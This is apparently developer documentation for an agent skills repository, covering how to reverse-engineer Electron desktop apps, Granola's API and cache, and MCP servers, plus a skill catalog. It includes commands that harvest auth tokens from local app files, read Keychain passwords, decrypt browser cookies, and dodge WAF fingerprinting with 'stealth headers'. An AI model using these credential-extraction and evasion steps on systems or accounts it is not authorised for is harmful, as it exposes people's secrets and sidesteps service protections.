
state = data.get("cache", {}).get("state", {})
entities = state.get("entities", {})

# What entity types exist?
print(entities.keys())  # ['chat_thread', 'chat_message']

Infer relationships

From the cache structure:

Observation	Implication
`chat_thread.data.grouping_key == "meeting:{doc_id}"`	Thread is linked to document
`chat_message.data.thread_id == thread.id`	Message belongs to thread
`entity.type == "chat_thread"`	API has `entity_type` parameter

The cache gives you:

Entity types — what to ask the API for
Relationships — how to filter and join
Field names — request/response shape

API Probing: Confirm and Call

You have a token and a list of endpoints. Now validate.

1. Reuse existing transport

If the API is behind a plain origin (no CloudFront WAF), urllib often works:

from urllib.request import Request, urlopen
import json, gzip

def api_post(token: str, endpoint: str, body: dict):
    req = Request(
        f"https://api.granola.ai{endpoint}",
        data=json.dumps(body).encode(),
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
            "Accept-Encoding": "gzip",
        },
        method="POST",
    )
    with urlopen(req, timeout=30) as r:
        raw = r.read()
        if r.headers.get("Content-Encoding") == "gzip":
            raw = gzip.decompress(raw)
        return json.loads(raw)

If you get 403, try httpx with HTTP/2 (see 1-transport).

2. Probe each endpoint

Start with the simplest call:

# List entities — what does the API return?
resp = api_post(token, "/v1/get-entity-set", {"entity_type": "chat_thread"})
# -> {"data": [{"id": "...", "workspace_id": "...", "created_at": "..."}], "entity_type": "chat_thread"}

3. Batch fetch for full data

The “set” endpoint usually returns IDs + minimal metadata. The “batch” endpoint returns full entities:

resp = api_post(token, "/v1/get-entity-batch", {
    "entity_type": "chat_thread",
    "entity_ids": ["uuid-1", "uuid-2"],
})
# -> {"data": [{"id": "...", "data": {"grouping_key": "meeting:doc-id", ...}}, ...]}

The data field on each entity is where the app-specific payload lives.

End-to-End Flow: Granola Example

Auth — ~/Library/Application Support/Granola/supabase.json → workos_tokens.access_token
Documents — POST /v2/get-documents (existing), POST /v1/get-documents-batch
Transcript — POST /v1/get-document-transcript
Panels — POST /v1/get-document-panels (AI summaries)
Chat threads — POST /v1/get-entity-set + get-entity-batch with entity_type: "chat_thread"
Chat messages — same with entity_type: "chat_message"
Link — chat_thread.data.grouping_key == "meeting:{document_id}" ties a thread to a meeting

Web URLs (from meeting summaries): https://notes.granola.ai/t/{thread_id} — same IDs as API.

API + Cache: Two Connections for Desktop Apps

Desktop apps that sync with a backend often have two data sources:

Source	Where	When to use
API	Network call with token	Fresh data, full transcripts, works when online
Cache	Local file (JSON, SQLite) the app writes	Instant, offline, token expired, or fallback

The app syncs entities into a local cache; that cache is often readable without the token. You can offer both as connections and let the caller choose.

Connection model

connections:
  api:
    description: "Live API — token from app, freshest data"
  cache:
    description: "Local cache — instant, works offline (reads app's cache file)"

Operations declare connection: api or connection: cache. Some operations may support both; others (e.g. get_meeting with full transcript) may be API-only if the cache doesn’t store transcripts.

When cache is enough

Operation	API	Cache
list_meetings	Yes — paginated from server	Yes — state.documents (may be stale)
list_conversations	Yes	Yes — entities.chat_thread filtered by grouping_key
get_conversation	Yes	Yes — entities.chat_message by thread_id
get_meeting	Yes — full transcript + panels	Partial — cache may have docs but not transcript text

Implementation pattern

CACHE_PATH = Path.home() / "Library" / "Application Support" / "Granola" / "cache-v6.json"

def load_cache() -> dict:
    with open(CACHE_PATH) as f:
        return json.load(f)

def cmd_list_conversations_from_cache(document_id: str) -> list:
    data = load_cache()
    threads = (data.get("cache", {}).get("state", {}).get("entities", {}) or {}).get("chat_thread", {})
    target_key = f"meeting:{document_id}"
    out = []
    for tid, t in threads.items():
        if (t.get("data") or {}).get("grouping_key") != target_key:
            continue
        out.append({...})
    return out

Source param: api | cache | auto

For operations that support both, add a source param:

api — live call only (default)
cache — local file only
auto — try API, fall back to cache on 401/network error

This gives offline resilience without requiring the user to pick a connection up front.

Pure-cache skills (WhatsApp, Copilot Money)

Some desktop apps have no documented API — the app syncs internally and we only read the local DB. Those are “cache-only” by necessity:

Skill	Data source	Pattern
WhatsApp	ChatStorage.sqlite	Cache-only
Copilot Money	CopilotDB.sqlite	Cache-only
Granola	api.granola.ai + cache-v6.json	API + cache

Subagent Strategy for Exploration

When the codebase is large or you need to search broadly:

Launch an explore subagent with the app path, cache path, and bundle path.
Tasks: Extract API URLs from app.asar, parse cache JSON structure, identify entity types and relationships.
Deliverable: Findings report with endpoints, auth location, data model.

Then implement the skill using those findings. The subagent does the tedious search-and-document step; you do the clean integration.

Checklist: New Desktop App Skill

Step	Action
1	Find the app: `mdfind` or `ls /Applications/`
2	Check for Electron: `app.asar` in Resources
3	Locate Application Support: `~/Library/Application Support/<AppName>/`
4	Find auth: grep for `token`, `access_token`, `Bearer` in JSON files
5	Find cache: large JSON or SQLite with `entities`, `state`, `cache`
6	Parse cache: entity types, relationships, field names
7	Extract endpoints: `strings` on binary or unpack asar, grep for `https://`, `/v1/`
8	Probe API: `get-entity-set`, `get-entity-batch` or equivalent with token
9	Implement: same patterns as web skills — operations, adapters, error handling

Real-World Examples

Skill	Discovery path	API + cache
`skills/granola/`	supabase.json token, cache-v6.json entities, app.asar → get-entity-set/batch, grouping_key for meeting→thread link	Yes — api/cache/auto via `source` param
`skills/whatsapp/`	ChatStorage.sqlite	Cache-only (no API)
`skills/copilot-money/`	CopilotDB.sqlite	Cache-only (no API)

Electron App Deep Dive

Electron apps are Chromium + Node.js packaged into a desktop shell. The JS bundle is readable, the storage is standard Chromium formats, and the auth tokens are often sitting in a JSON file. Once you know where to look, Electron is one of the easiest desktop targets.

Part of Layer 6: Desktop Apps. See also 3-auth for general auth patterns.

Identify Electron

ls /Applications/SomeApp.app/Contents/Resources/
# Look for: app.asar  ← bundled JS/HTML/CSS
#           app/      ← unpacked (less common)

file /Applications/SomeApp.app/Contents/MacOS/SomeApp
# Should reference Electron framework

Extract and Read the Bundle

# One-shot: extract app.asar to /tmp/app
npx @electron/asar extract /Applications/SomeApp.app/Contents/Resources/app.asar /tmp/app

ls /tmp/app
# Typical: dist-electron/  dist-app/  node_modules/  package.json

The bundle is minified but readable. Variable names are mangled; string literals (URLs, endpoint paths, header names) are not minified. Use these to navigate.

Find all API endpoints

grep -o "[a-zA-Z]*\.example\.com[^\"']*" /tmp/app/dist-electron/main/index.js | sort -u

Find all subdomains

grep -o "[a-z-]*\.example\.com" /tmp/app/dist-electron/main/index.js | sort -u

Find auth header construction

# Look for Authorization, X-Client-*, bearer
grep -o ".{0,150}Authorization.{0,150}" /tmp/app/dist-electron/main/index.js | head -10

Storage Locations

All Electron app data lives in:

~/Library/Application Support/<AppName>/

File / Dir	What it contains
`*.json` files	Auth tokens, config, feature flags
`Cookies`	SQLite — Chromium encrypted cookies (usually empty in Electron)
`Local Storage/leveldb/`	LevelDB — localStorage, sometimes tokens
`IndexedDB/file__0.indexeddb.leveldb/`	IndexedDB — app state, can contain tokens
`Preferences`	JSON — per-profile settings

Electron apps typically store auth in JSON files, not browser cookies, because the main process (Node.js) writes them directly without going through Chromium’s cookie jar.

Find the Token

1. Scan JSON files for tokens

for f in ~/Library/Application\ Support/AppName/*.json; do
  echo "=== $f ===" && python3 -c "
import json, sys
with open('$f') as f: d = json.load(f)
def walk(obj, p=''):
    if isinstance(obj, dict):
        for k,v in obj.items(): walk(v, p+'.'+k)
    elif isinstance(obj, str) and len(obj) > 20:
        print(f'  {p}: {obj[:60]}')
walk(d)
"
done

2. Look for JWT patterns

# JWTs start with eyJ (base64url of {"alg":...)
grep -r "eyJ" ~/Library/Application\ Support/AppName/ --include="*.json" -l

3. Decode any JWT you find

import base64, json

def decode_jwt(token):
    parts = token.split('.')
    def b64d(s):
        s += '=' * (4 - len(s) % 4)
        return json.loads(base64.urlsafe_b64decode(s))
    return b64d(parts[0]), b64d(parts[1])   # header, payload

header, payload = decode_jwt(token)
print("iss:", payload.get("iss"))   # who issued it
print("exp:", payload.get("exp"))   # expiry
print("claims:", list(payload.keys()))

The iss field tells you the auth provider (WorkOS, Supabase, Auth0, Okta, etc.) and which client ID / tenant.

Required Headers

Most Electron APIs reject requests missing client identification headers. Find them by searching the bundle for the header-building function:

# Common patterns: X-Client-*, X-App-*, platform, device-id
grep -o ".{0,100}X-Client.{0,200}" /tmp/app/dist-app/assets/operationBuilder.js | head -5

Typical Electron API headers:

Header	Example	Notes
`X-Client-Version`	`7.71.1`	App version from `package.json`
`X-Client-Platform` / `X-Granola-Platform`	`darwin`	OS platform
`X-Workspace-Id`	UUID	Multi-tenant identifier
`X-Device-Id`	UUID	Persisted device fingerprint

Without these, the server may return {"message":"Unsupported client"} even with a valid token.

Get the version:

cat /tmp/app/package.json | python3 -c "import json,sys; d=json.load(sys.stdin); print(d['version'])"

Auth Migration Pattern (Supabase → WorkOS)

Many Electron apps launched with Supabase Auth and later migrated to WorkOS (or Clerk, Auth0, etc.) for enterprise SSO. The telltale sign:

~/Library/Application Support/AppName/supabase.json   ← filename from v1
  → contents: { "workos_tokens": "...", "user_info": ... }  ← migration artifact

The filename is kept for backward compatibility, but the contents changed. The old Supabase user UUID is preserved as external_id in the new JWT so database foreign keys don’t break.

How to detect a migration:

import json

with open("supabase.json") as f:
    d = json.load(f)

if "workos_tokens" in d:
    print("Migrated to WorkOS — parse workos_tokens as JSON for the JWT")
elif "access_token" in d:
    print("Still on Supabase — access_token is the JWT directly")
elif "session" in d:
    print("Supabase session object — check session.access_token")

See workos.md for the full WorkOS token model.

CrossAppAuth — Desktop ↔ Web Session Handoff

Some Electron apps share a session between the desktop client and the web app without requiring a separate login. The pattern:

User logs in on the web app (browser)
Desktop app detects the session (via deep link, polling, or IPC)
Desktop calls an auth-handoff-complete-style endpoint with the web session
Server mints a new desktop token (different expiry, different claims)

You’ll see this as sign_in_method: "CrossAppAuth" in the JWT payload, or as an endpoint like /v1/auth-handoff-complete in the app bundle.

To find:

grep -o "[^\"]*auth.handoff[^\"]*\|[^\"]*cross.app[^\"]*" /tmp/app/dist-electron/main/index.js

Feature Flags

Electron apps frequently gate features behind server-controlled flags stored in local-state.json or a similar config file:

import json

with open("local-state.json") as f:
    d = json.load(f)

flags = d.get("featureFlags", {})
for k, v in flags.items():
    print(f"  {k}: {v}")

If an API endpoint returns 403 Forbidden or {"enabled": false} even with a valid token, check whether there’s a feature flag that needs to be true. Some flags are user-controlled (toggle in Settings), others are server-pushed and require a plan upgrade.

Chromium Storage (usually empty)

Electron apps can use Chromium cookies and localStorage, but most don’t — the Node.js main process writes tokens directly to JSON files instead.

If you do find a populated Cookies database, decrypt it the same way as Brave or Chrome:

# Check if there's a Keychain entry
security find-generic-password -s "AppName Safe Storage" -a "AppName" -w

# Cookies database
sqlite3 ~/Library/Application\ Support/AppName/Cookies \
  "SELECT name, host_key FROM cookies LIMIT 20;"

See the skills/brave-browser/ skill for the full Chromium cookie decryption pipeline (PBKDF2 + AES-128-CBC).

Checklist

□ Find app.asar and extract it
□ Grep for all subdomains and API endpoints
□ Find the header-building function → identify required custom headers
□ Scan ~/Library/Application Support/<App>/*.json for tokens
□ Decode any JWT → check iss, exp, claims
□ Detect auth migration (supabase.json but workos_tokens key?)
□ Test token against a known-working endpoint with correct headers
□ Check for feature flags gating the feature you need

Reverse Engineering — MCP Servers

How to discover, evaluate, and map Model Context Protocol (MCP) servers for skills that need to connect as MCP clients. Unlike web reverse-engineering, MCPs are self-describing — tools/list hands you the full tool catalog. What you’re reverse-engineering is auth, actual response shapes, coverage gaps, and behavioral quirks.

This is Layer 7 of the reverse-engineering docs:

Layer 1: Transport — 1-transport
Layer 2: Discovery — 2-discovery
Layer 3: Auth & Runtime — 3-auth
Layer 4: Content — 4-content
Layer 5: Social Networks — 5-social
Layer 6: Desktop Apps — 6-desktop-apps
Layer 7: MCP Servers (this file) — discovering and evaluating MCPs for skill integration

Tool: The MCP test harness in agentos/scripts/mcp-test.mjs is the primary probe. Use it to discover tools, test calls, and inspect responses. Smithery registry (mcp-test.mjs smithery search) finds third-party MCPs.

Transport — use httpx, not urllib

HTTP MCPs (Granola, Linear, etc.) often sit behind CloudFront or Cloudflare. Python urllib and requests advertise http/1.1 and get flagged by JA4 fingerprinting. Follow 1-transport: use httpx with http2=True for Python probes. Node fetch is fine (negotiates HTTP/2). Skill-local probe scripts (e.g. skills/granola/mcp-probe.py) should use httpx.

Layer 0: Existence — Does the service have an MCP?

Before anything else, determine if an MCP exists for the service. Three discovery paths:

Convention probing

Most services follow predictable URL patterns. Probe these for every skill you have:

Pattern	Example
`https://mcp.{domain}/mcp`	Granola: `mcp.granola.ai/mcp`, Linear: `mcp.linear.app/mcp`
`https://{domain}/mcp`	`https://example.com/mcp`
`https://api.{domain}/mcp`	`https://api.example.com/mcp`

Probe: Send a bare POST with an initialize JSON-RPC request. A 404 or connection refused means nothing there. A JSON-RPC response or auth challenge means you found one.

# Using mcp-test.mjs with a raw URL (no auth)
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp

Smithery registry

The Smithery registry indexes MCPs published by third parties. Use this for services that might have community MCPs but no official one:

node scripts/mcp-test.mjs smithery search "granola"
node scripts/mcp-test.mjs smithery search "linear"

Web search

Services are publicly announcing MCP support. Search for "{service name}" MCP or "{service name}" Model Context Protocol in changelogs, blog posts, or docs.

Output: Existence table

Skill	MCP URL	Transport	Status
granola	`mcp.granola.ai/mcp`	HTTP	found
linear	`mcp.linear.app/mcp`	HTTP	found
todoist	`npx @abhiz123/todoist-mcp-server`	stdio	found (3rd party)
goodreads	—	—	none found

Layer 1: Transport — How does the session work?

MCPs run over two transports. The harness handles both; you need to log what you observe.

Streamable HTTP

POST JSON-RPC to the URL
Response may be plain JSON or SSE (event: message\ndata: {...})
mcp-session-id in response headers — session-stateful vs stateless
Used by: Granola, Linear, other hosted MCPs

Stdio

Spawn subprocess: npx -y @package/mcp-server
JSON-RPC over stdin/stdout, newline-delimited
Used by: Todoist, Notion, Slack (npm packages)

What to log

Field	How to check
`mcp-session-id`	Response headers on first request
Response format	SSE vs plain JSON body
`protocolVersion`	From `initialize` response `result.serverInfo`
`capabilities`	Tools, resources, prompts, logging
Server-initiated requests	Any during handshake?

Layer 2: Auth — What does it need and how do you get in?

MCP auth discovery is a waterfall. The protocol is designed for this.

Step 1: Naked probe

Send initialize with no auth headers.

Outcome	Meaning
Success	Public MCP, no auth (rare for user data)
`401` with `WWW-Authenticate`	Auth required; header describes scheme
Connection accepted, `tools/call` fails	Auth is per-call, not per-session

Step 2: OAuth discovery

Two discovery paths. The 401 response may include resource_metadata pointing at one of these:

Protected resource discovery (RFC 9729):

GET {origin}/.well-known/oauth-protected-resource

Returns authorization_servers, resource, bearer_methods_supported. Example: Granola’s 401 pointed to this; response: {"authorization_servers":["https://mcp-auth.granola.ai"], ...}.

OAuth authorization server discovery (RFC 8414):

GET {origin}/.well-known/oauth-authorization-server

Returns authorization_endpoint, token_endpoint, scopes_supported for the full OAuth flow.

Step 3: Token reuse hypothesis

For services where you already have a skill: can you reuse the existing token? Granola’s supabase token, Linear’s API key — do they work as Authorization: Bearer {token} against the MCP endpoint? This is a single-line test.

Step 4: Scope mapping

Once authenticated: does the MCP give full access or a restricted view? Some MCPs expose read-only tools even if the underlying API supports writes.

Layer 3: Tool catalog — What’s exposed?

This is where MCPs are radically easier than web reverse-engineering. tools/list returns the full catalog:

{
  "tools": [{
    "name": "list_meetings",
    "description": "List recent meetings",
    "inputSchema": { "type": "object", "properties": { "limit": { "type": "integer" } } }
  }]
}

Cross-reference with existing skill

For each MCP tool, find the corresponding operation in your existing skill. Build a coverage matrix:

Your Operation	MCP Tool	Match?	Notes
`list_meetings`	`list_meetings`	exact	Same params?
`get_meeting`	`get_document`	name differs	Check if transcript included
`list_conversations`	—	no match	MCP doesn’t expose Q&A
—	`create_note`	no match	MCP has write we don’t

This matrix is the key deliverable — it tells you whether the MCP is superset, subset, or lateral complement.

Annotation analysis

Check tool.annotations:

readOnlyHint — safe to probe, no mutating
destructiveHint — mutates state, be careful in testing

Layer 4: Response analysis — What does the data look like?

MCP input schemas are declared; output is usually opaque content: [{type: "text", text: "..."}]. You must call each tool and inspect.

For each read-safe tool

Call with minimal params
Unwrap content[0].text and parse as JSON
Document the actual response shape — field names, nesting, types
Compare field-by-field to your existing skill’s normalized output

This answers: Is the MCP richer, thinner, or different? Does Granola’s MCP return raw utterances like the internal API, or only a pre-formatted summary?

Layer 5: Gap analysis — Is it worth connecting?

For each service, combine layers 0–4 into a verdict:

Signal	Implication
MCP covers all your operations with equal or richer data	MCP as primary, existing skill as fallback
MCP covers some, misses others	Multi-connection: MCP for what it covers, API for the rest
MCP is thinner than your skill	Keep existing skill; MCP not worth it
MCP exposes tools you don’t have (especially writes)	MCP as additive connection
Auth is significantly easier via MCP	MCP worth it for auth stability alone

Running the analysis

For each service, work through layers 0–4 using mcp-test.mjs:

# Generic harness (agentos repo) — pass URL; MCP_BEARER_TOKEN for auth
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp call list_meetings '{"limit": 3}'

# Skill-local exploration (agentos-community) — reads token from Granola app
python3 skills/granola/mcp-probe.py
python3 skills/granola/mcp-probe.py tools

Start with services where you already have skills (Granola, Linear). You have ground truth — your existing skill tells you exactly what data to expect. The output is a completed coverage matrix and a clear verdict.

Real-World Examples

Skill	MCP URL	Transport	Auth	Coverage
granola	`mcp.granola.ai/mcp`	HTTP	Different auth — supabase token invalid. `401` returns `WWW-Authenticate: Bearer error="invalid_token"`, `resource_metadata="https://mcp.granola.ai/.well-known/oauth-protected-resource"`. MCP uses OAuth; internal API token does not work. Probe with httpx succeeds (no TLS block).
linear	`mcp.linear.app/mcp`	HTTP	OAuth / API key	TBD — run analysis

Fill this table as you run the analysis. See skills/granola/ for the existing Python skill’s operations and adapter schema.

Probe commands

Use the generic harness (no service-specific code) or skill-local scripts:

# Generic MCP harness (agentos repo) — pass URL; set MCP_BEARER_TOKEN for auth
node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp
MCP_BEARER_TOKEN=$(python3 -c "
import json
from pathlib import Path
p = Path.home() / 'Library/Application Support/Granola/supabase.json'
t = json.loads(json.load(p.open())['workos_tokens'])
print(t['access_token'])
") node scripts/mcp-test.mjs http https://mcp.granola.ai/mcp

# Skill-local exploration (agentos-community)
python3 skills/granola/mcp-probe.py

Helper Files & Patterns

Helper files

Keep skill YAML readable. When executor logic starts looking like real code, extract it into a helper file in the skill folder and have the operation call that file.

Keep in readme.md (markdown only — narrative, setup, examples):

when to use the skill, limitations, and agent-facing notes
short examples and troubleshooting

Keep in skill.yaml:

id, name, connections, adapters, operations, executors, and all machine-readable wiring

Move into helper files:

long AppleScript, Swift, Python, or shell logic
anything with loops, branching, string escaping, or manual JSON construction
anything large enough that syntax highlighting, direct local execution, or isolated debugging would help

Preferred patterns:

use Swift helper files for Apple framework integrations like Contacts, EventKit, or other native macOS APIs
use Python helper files for parsing, normalization, and API glue — prefer python: executor over command: + binary: python3
use bash only for thin wrappers or simple pipelines
keep AppleScript inline only when it is truly short; otherwise prefer a helper file

Leading examples

Skill	Pattern	File
`gmail`	`_call` dispatch: list stubs then hydrate	`gmail.py`
`goodreads`	GraphQL discovery, Apollo cache extraction, multi-tier runtime config	`public_graph.py`
`claude`	API replay with session cookies and stealth headers	`claude-api.py`
`austin-boulder-project`	Bundle config extraction and tenant-namespace auth	`abp.py`
`exa`	Dashboard auth flows, `__secrets__` import, Playwright→HTTPX pattern	(in progress)
`reddit`	Shell helper for comment posting	`comments_post.sh`
`apple-contacts`	Swift helpers for native macOS APIs	`accounts.swift`, `get_person.swift`

Advanced patterns

This book does not try to document every executor or every edge case. If you need something advanced, copy an existing skill:

linear for GraphQL with connections
youtube for command execution
gmail + mimestream for provider-sourced OAuth and _call dispatch
claude + brave-browser for consumer/provider cookie patterns
goodreads for multi-connection (graphql + web) and sandbox storage
granola for multi-connection (API + cache) with Python connection dispatch
exa (in progress) for dashboard auth flows, __secrets__ secret import, and the Playwright→HTTPX discovery pattern
an existing cookie-provider skill for keychain, crypto, and multi-step extraction

For skills that reverse-engineer web services without public APIs, see the Reverse Engineering section.

Skill Catalog

All skills in this repo. Each skill folder contains skill.yaml (the manifest) and readme.md (agent-facing docs).

Web & Search

Skill	Entities	What it does
`exa`	webpage	Semantic web search and content extraction
`brave`	webpage	Web search via Brave Search API
`firecrawl`	webpage	Browser-rendered page scraping
`curl`	webpage	Simple URL fetching (no API key needed)
`serpapi`	—	Flight search via SerpAPI
`research-web`	document	Multi-source web research

Productivity

Skill	Entities	What it does
`todoist`	task, project, tag	Task management with priorities and projects
`linear`	task, project	Engineering project management
`gmail`	email	Gmail via OAuth (read, search, send)
`apple-calendar`	meeting, calendar	macOS Calendar events
`apple-contacts`	person	macOS Contacts

Skill	Entities	What it does
`imessage`	message, conversation, person	iMessage history
`whatsapp`	message, conversation, person	WhatsApp history
`reddit`	post, forum	Posts and comments from Reddit
`hackernews`	post	Stories, comments, and discussions
`facebook`	post	Facebook community posts

Media & Content

Skill	Entities	What it does
`youtube`	video, channel, post	Video metadata, transcripts, and comments
`moltbook`	book	Book metadata and reading lists
`goodreads`	book, review, shelf	Goodreads library, reviews, and social reading

Developer Tools

Skill	Entities	What it does
`github`	—	GitHub repos, issues, PRs
`git`	—	Local git operations
`cursor`	document	Research reports from Cursor sub-agents
`posthog`	—	Product analytics

Finance & Commerce

Skill	Entities	What it does
`amazon`	product, order	Amazon orders and product data
`chase`	—	Chase bank account data
`copilot-money`	—	Financial tracking

AI & APIs

Skill	Entities	What it does
`claude`	—	Claude.ai web API (cookie-based)
`anthropic-api`	—	Anthropic API (key-based)
`openrouter`	—	Multi-model routing
`ollama`	—	Local LLM inference

Browser & System

Skill	Entities	What it does
`playwright`	—	Browser control via CDP — discovery and reverse engineering tool
`brave-browser`	webpage, history	Browser history and cookie provider
`firefox`	—	Firefox cookie provider
`macos-control`	—	macOS automation (windows, apps, screenshots)
`macos-security`	—	Keychain audit, token extraction, Google OAuth app scanning
`kitty`	—	Kitty terminal control
`raycast`	—	Raycast extension control

Other

Skill	Entities	What it does
`mimestream`	—	OAuth token provider (Google)
`here-now`	—	Location-aware context
`granola`	—	Meeting notes and transcripts
`porkbun`	—	Domain management
`gandi`	—	Domain management
`logo-dev`	—	Logo/brand image lookup
`austin-boulder-project`	—	Climbing gym schedules
`icloud`	—	iCloud data access

Keyboard shortcuts

AgentOS Skills